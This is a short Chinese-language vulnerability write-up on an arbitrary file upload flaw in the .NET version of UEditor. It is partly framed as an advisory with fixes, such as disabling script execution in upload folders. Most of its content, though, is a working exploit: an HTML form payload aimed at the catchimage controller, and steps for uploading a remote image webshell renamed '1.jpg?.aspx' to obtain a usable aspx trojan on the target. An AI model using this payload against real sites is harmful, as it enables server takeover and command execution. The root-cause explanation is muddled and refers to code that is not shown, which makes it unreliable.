UEditor .net版本任意文件上傳
簡介
ueditor是百度官方技術團隊開發的一套前端編輯器,可以上傳圖片,寫文字,支持自定義的html編寫,移動端以及電腦端都可以無縫對接,自適應頁面,圖片也可以自動適應當前的上傳路徑與頁面比例大小,一些視頻文件的上傳,開源,高效,穩定,安全,一直深受站長們的喜歡。
百度的UEditor文本編輯器,近幾年很少被曝出漏洞,事情沒有絕對的,總會有漏洞,這次被曝出的漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影響,.net存在任意文件上傳,繞過文件格式的限制,在獲取遠程資源的時候並沒有對遠程文件的格式進行嚴格的過濾與判斷,攻擊者可以上傳任意文件包括腳本執行文件,包括aspx腳本木馬,asp腳本木馬,還可以利用該UEditor漏洞對服務器進行攻擊,執行系統命名破壞服務器,由於漏洞危害嚴重性較高,受害網站較多
漏洞payload
<form action="http://www/ueditor/net/controller.ashx?action=catchimage&encode=utf-8" enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <input type="submit" value="Submit" /> </form>將他保存為Html文件
然后我們打開html看到,需要一個遠程鏈接的文件,這里我們可以找一個圖片腳本木馬,最好是一句話圖片小馬,把該小馬文件上傳到我們的網站服務器里,把文件名改為1.jpg?.aspx,然后復制網站鏈接到構造的html中去,如下圖:
點擊submit,直接上傳成功,並返回我們的aspx腳本木馬路徑地址,我們打開就可以使用了。
UEdito漏洞分析
那么UEdito漏洞到底是如何產生的呢?最主要的還是利用了IIS的目錄解壓功能,在解壓的同時會去訪問控制器文件,包括controller.aspx文件,當上傳到網站里的時候,會自動解壓並調用一些特殊應用的目錄地址,有些目錄都可以被遠程的調用,我們看下面的代碼:
漏洞修復
1.目前臨時的漏洞修復是建議,把文件上傳目錄設置無腳本執行權限,uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目錄都設置上無腳本權限。
2.在百度UEditor官方沒有出補丁前,設置圖片目錄為只讀,禁止寫入。
3.修改程序的源代碼,對crawlerhandler源文件進行文件上傳格式的嚴格過濾與判斷。